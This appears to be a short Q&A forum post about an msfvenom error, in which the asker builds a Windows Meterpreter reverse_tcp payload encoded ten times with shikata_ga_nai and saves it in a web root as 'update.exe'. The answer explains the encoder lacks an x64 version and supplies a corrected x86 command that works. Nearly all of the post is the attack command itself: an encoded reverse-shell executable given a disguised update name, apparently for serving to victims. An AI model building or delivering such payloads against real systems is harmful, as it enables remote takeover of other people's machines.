# Error: The selected arch is incompatible with the payload

Tags: metasploit

msfvenom --payload windows/meterpreter/reverse_tcp LHOST=********* LPORT=8080 -f exe --platform windows --arch x64 -e x64/shikata_ga_nai -i 10 > /var/www/html/update.exe

Answer (score 2):

The encoder "shikata_ga_nai" doesn't have a x64 version. Thus, you can't this encoder for x64 payload encryption.

The correct version for x86 system:

```
msfvenom --payload windows/meterpreter/reverse_tcp LHOST=********* LPORT=8080 -f exe --platform windows --arch x86 -e x86/shikata_ga_nai -i 10 > /var/www/html/update.exe
```